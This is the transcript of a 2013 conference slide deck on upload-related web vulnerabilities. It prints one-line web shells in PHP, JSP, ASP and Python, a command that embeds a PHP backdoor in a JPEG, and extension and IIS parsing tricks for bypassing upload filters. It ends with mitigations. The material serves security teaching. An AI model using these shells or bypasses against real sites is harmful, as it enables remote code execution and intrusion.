Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Best Practices - The Upload

Orange
August 21, 2024
17

Best Practices - The Upload

Webconf 2013

Orange

August 21, 2024
Tweet

Transcript

  1. • aka Orange • 2009 • 2011, 2012 • 2011

    AVTOKYO • 2012 PHP Conf • 2012 VXRLConf • – – Web Security – Windows Vulnerability Exploitation
  2. • CHROOT Security Group • NISRA • Disclosed – MS12-071

    / CVE-2012-4775 • http://blog.orange.tw/
  3. 1. Reconnaissance – Google Hacking, Reversed Whois, AXFR …… 2.

    Scanning – SYN/ACK Scan, TCP NULL/FIN/Xmas/Mainmon/Window Scan, SCTP INIT Scan, Hydra, Nessus …… 3. Gaining Access – Heap/Stack/V-table Overflow, ROP, Heap Spray, System Misconfiguration, Metasploit, Exploit Database …… 4. Maintaining Access – Privilege Escalation, Trojan, Backdoor, Rootkit, Code/DLL Injection, API Hook, LD_PRELOAD, Anti AV/Debugger …… 5. Clearing Tracks – Syslog, WTMP/UTMP, Event Log, Shell(Bash/Explorer) ……
  4. • • – <?php eval( $_REQUEST[cmd] );?> – Runtime.getRuntime().exec( cmd

    ) – <%eval request("cmd") %> – __import__('os').system(cmd)
  5. • – PHP CGI PATH_INFO • – /index.php/module/login – /index/module/login

    • – /userfiles/mypic.jpg – /userfiles/mypic.jpg/nihao.php
  6. • – Huffman table – EXIF • – copy /b

    rst.jpg+backdoor.php dst.jpg • – http://orange.tw/exif.jpg
  7. • – – – • – php phtml php3 php4

    php5 – asp asa cer cdx shtml – aspx asax ascx ashx asmx http://www.hitcon.org/download/2010/5_Flash Exploit.pdf#Page.20
  8. • • – user.jpg  .jpg – user.php.jpg  .jpg

    – user.php.xxx  .php – user.php.xxx.ooo  .php
  9. • – IIS < 7 – Asp.net ^__< • –

    http://webconf.orange.tw/files/a.asp/user.jpg • – http://webconf.orange.tw/files/user.asp;aa.jpg user.asp;aa.jpg
  10. • Update your sense and software. • User controlled filename

    is always dangerous. – Whatever filename, extension or temporary filename. • Use Image library to valid or strip the image. • Disabled the directory’s execution permission you uploaded to.